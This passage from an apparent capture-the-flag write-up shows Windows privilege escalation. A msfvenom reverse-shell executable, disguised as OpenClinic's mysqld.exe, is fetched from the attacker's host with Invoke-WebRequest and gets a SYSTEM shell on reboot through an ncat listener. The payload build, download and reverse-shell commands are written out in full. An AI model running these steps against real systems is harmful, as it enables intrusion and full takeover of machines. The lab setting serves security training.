&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic\mariadb\bin&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;get-acl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic\mariadb&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Owner&lt;/span&gt;&lt;span class="w"&gt;                  &lt;/span&gt;&lt;span class="nx"&gt;Access&lt;/span&gt;&lt;span class="w"&gt;                                                                                     
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-----&lt;/span&gt;&lt;span class="w"&gt;                  &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt;                                                                                     
&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;BUILTIN\Administrators&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\SYSTEM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Allow&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;FullControl...&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic\mariadb\bin&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;whoami&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/groups&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;GROUP&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;INFORMATION&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;-----------------&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;                                                    &lt;/span&gt;&lt;span class="nx"&gt;Type&lt;/span&gt;&lt;span class="w"&gt;             &lt;/span&gt;&lt;span class="nx"&gt;SID&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;Attributes&lt;/span&gt;&lt;span class="w"&gt;                                                     
&lt;/span&gt;&lt;span class="o"&gt;=============================================================&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;================&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;============&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;===============================================================&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Everyone&lt;/span&gt;&lt;span class="w"&gt;                                                      &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-1-0&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\Local&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;member&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Administrators&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-114&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;BUILTIN\Administrators&lt;/span&gt;&lt;span class="w"&gt;                                        &lt;/span&gt;&lt;span class="nx"&gt;Alias&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-32-544&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;owner&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;BUILTIN\Users&lt;/span&gt;&lt;span class="w"&gt;                                                 &lt;/span&gt;&lt;span class="nx"&gt;Alias&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-32-545&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\BATCH&lt;/span&gt;&lt;span class="w"&gt;                                            &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-3&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;CONSOLE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;LOGON&lt;/span&gt;&lt;span class="w"&gt;                                                 &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-2-1&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\Authenticated&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Users&lt;/span&gt;&lt;span class="w"&gt;                              &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-11&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Organization&lt;/span&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-15&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\Local&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="w"&gt;                                    &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-113&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;LOCAL&lt;/span&gt;&lt;span class="w"&gt;                                                         &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-2-0&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\NTLM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Authentication&lt;/span&gt;&lt;span class="w"&gt;                              &lt;/span&gt;&lt;span class="nx"&gt;Well-known&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;S-1-5-64-10&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;by&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;default&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Enabled&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;group&lt;/span&gt;&lt;span class="w"&gt;             
&lt;/span&gt;&lt;span class="n"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Label\High&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Mandatory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Level&lt;/span&gt;&lt;span class="w"&gt;                          &lt;/span&gt;&lt;span class="nx"&gt;Label&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;S-1-16-12288&lt;/span&gt;&lt;span class="w"&gt;                                                     

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks like we can.&lt;/p&gt;

&lt;p&gt;Let's begin. &lt;/p&gt;

&lt;h2&gt;
  
  
  Generate Payload
&lt;/h2&gt;

&lt;p&gt;On our machine.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
 &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; MSFvenom Payload Creator &lt;span class="o"&gt;(&lt;/span&gt;MSFPC v1.4.5&lt;span class="o"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;[&lt;/span&gt;i]   IP: 10.14.31.78
 &lt;span class="o"&gt;[&lt;/span&gt;i] PORT: 443
 &lt;span class="o"&gt;[&lt;/span&gt;i] TYPE: windows &lt;span class="o"&gt;(&lt;/span&gt;windows/shell_reverse_tcp&lt;span class="o"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;[&lt;/span&gt;i]  CMD: msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/shell_reverse_tcp &lt;span class="nt"&gt;-f&lt;/span&gt; exe &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--platform&lt;/span&gt; windows &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;-e&lt;/span&gt; generic/none &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;10.14.31.78 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;443 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'&lt;/span&gt;

 &lt;span class="o"&gt;[&lt;/span&gt;i] windows shell created: &lt;span class="s1"&gt;'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'&lt;/span&gt;

 &lt;span class="o"&gt;[&lt;/span&gt;i] MSF handler file: &lt;span class="s1"&gt;'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'&lt;/span&gt;
 &lt;span class="o"&gt;[&lt;/span&gt;i] Run: msfconsole &lt;span class="nt"&gt;-q&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'&lt;/span&gt;
 &lt;span class="o"&gt;[&lt;/span&gt;?] Quick web server &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;for &lt;/span&gt;file transfer&lt;span class="o"&gt;)&lt;/span&gt;?: python2 &lt;span class="nt"&gt;-m&lt;/span&gt; SimpleHTTPServer 8080
 &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Done!

└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;mv &lt;/span&gt;windows-shell-stageless-reverse-tcp-443.exe mysqld.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the server. &lt;/p&gt;

&lt;p&gt;We will have to restart the computer as per the exploit instructions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic\mariadb\bin&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;mv&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;mysqld.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;mysqld.exe.bak&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic\mariadb\bin&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;IWR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Uri&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;http://10.14.31.78/mysqld.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-OutFile&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;mysqld.exe&lt;/span&gt;&lt;span class="w"&gt;                    

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Restart-Computer&lt;/span&gt;&lt;span class="w"&gt; 

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we wait for our reverse shell to activate.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;└─$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ncat&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-lnvp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;443&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;7.93&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;https://nmap.org/ncat&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Listening&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;:::&lt;/span&gt;&lt;span class="nx"&gt;443&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Listening&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0.0.0.0:443&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.10.52.62.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.10.52.62:49669.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Windows&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;17763&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;737&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;2018&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Microsoft&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Corporation.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;All&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;rights&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;C:\Windows\system32&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="nx"&gt;whoami&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;whoami&lt;/span&gt;&lt;span class="w"&gt;
